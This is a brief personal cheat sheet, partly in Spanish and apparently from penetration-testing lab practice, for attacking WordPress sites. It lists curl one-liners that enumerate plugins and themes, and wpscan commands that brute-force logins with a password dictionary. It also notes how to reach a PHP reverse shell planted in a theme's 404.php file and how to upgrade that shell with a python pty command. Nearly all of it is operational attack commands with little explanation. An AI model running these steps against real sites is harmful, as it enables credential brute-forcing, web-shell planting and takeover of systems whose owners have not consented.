#######################################Passive plugins enumeration

curl -s -X GET http://página | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2

######################################Passive themes enumeration

curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2



######################################WPSCAN

wpscan -url "" 
wpscan -url "" --usernames "" --passwords "dictio"



acceder a la pagina php con la shell
http://"ip o url"/wp-content/themes/"tema"/404.php

si la reverse shell es la monkey, para migrar a una shell más estable:
python -c 'import pty;pty.spawn("/bin/bash")' 
